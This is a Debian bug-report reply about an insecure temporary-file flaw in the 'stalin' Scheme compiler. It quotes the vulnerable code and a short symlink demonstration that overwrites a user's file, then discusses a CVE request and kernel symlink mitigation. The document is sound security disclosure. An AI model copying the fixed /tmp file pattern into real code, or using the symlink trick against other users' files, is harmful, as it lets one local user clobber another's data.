Hi Steve, On Tue, Dec 22, 2015 at 10:38:54AM +0000, Steve Kemp wrote: > > Package: stalin > Version: 0.11-5 > Severity: critical > Tags: security > > > When `stalin` launches it attempts to detect its environment via > the following code in /usr/lib/stalin/QobiScheme.sc: > > > (system "uname -m >/tmp/QobiScheme.tmp") > ... > (system "rm -f /tmp/QobiScheme.tmp")) > > This is a prime example of the insecure use of temporary files, > and allows overwriting any file owned by the user who invokes > stalin. > > Trivial demonstration: > > > $ ln -s /home/steve/HACK /tmp/QobiScheme.tmp > $ ls -l /home/steve/HACK > ls: cannot access /home/steve/HACK: No such file or directory > > Now run the sample code: > > > $ cd /tmp/stalin-0.11/benchmarks > $ ./make-hello > > And we see this: > > $ ls -l /home/steve/HACK > -rw-r--r-- 1 steve steve 6 Dec 22 08:30 /home/steve/HACK
I have requested a CVE here http://www.openwall.com/lists/oss-security/2015/12/27/1 I think the severity though can be downgraded (unless I miss something), since on Default Debian GNU/Linux installations Linux has fs.protected_symlinks=1 which mitigates the attack vector. Regards, Salvatore